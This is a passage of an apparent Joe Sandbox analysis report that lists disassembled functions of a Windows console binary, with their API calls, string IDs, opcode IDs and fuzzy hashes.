                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 46dcad897a3af043d264e5e9165a4e58e3145294cf8b8be1aaa7afa00ca2a06b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8F04B32A1864782FB54AB05F84006CFBA0FB89B10BD99036D94B03364DFBCE485CA20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca4f8b397122741c5fcccfe2269068fe735008dd1e6df284b4b01d88ebfd9961
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72C0123170464F47FB1C7731645513D95A45B09201FC45479C507D22A2DDBCD4048610
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1525508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: DefaultUser
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358694519-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 10979a80bf34ff0989239b922509f9a63a90d24d5a349f4383df43e162f965fe
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E0C2A3E2826B9AF7983A4170413FC9953CB68782FC440B3CB0FC12E0496D2C415228
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c5a1ef935451652ba15f2c70175c88724b831a707ff175dd80a81c0825bc7dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8F0B422B0978A40FF409756B54016D92919B48BF0BD88332EA7E87BE5DE7CD4518300

                                                                                                                                                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1537F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F44
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1537F5C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537F9E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1537FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538020
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538036
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538061
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538075
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15380D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D15380EA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538177
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153819A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381BD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381DC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153821A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538239
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538291
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382D7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153831A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538364
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538378
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153839A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383AE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383E6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538403
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538418
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2231802c5beab9bdd248c916e857ea9e4c0ad7af45889cd9912036ac3472a9aa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6E15B31B0865B8AF714AB62A80017DFAA1FB49B95BD48276DD1F537B0DFBCA405C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1517650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 95024817-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f265ff26c7c94db9bffff594ef0a0d1e80106e717b9f263da8157f02c455b50f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA128132A0868B86FB64AF15A45017DFAA1FB89750FC44136EA5F477B5DFBCE4408B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1516EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1795611712-3662956551
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd2b9476af5b3282e010b4d465cfd375f84984d578800b47ea2b8ccd8163617a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCE1CE22E0864B86FB50AB64A8442BDE6A1FF48784FD04133E90F576B5DFBCE584C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153EE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF7D153EF33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EF98
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFA9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D153EFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F003
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F022
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F083
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F092
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F0A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7D153F0DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F135
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F16C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F185
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
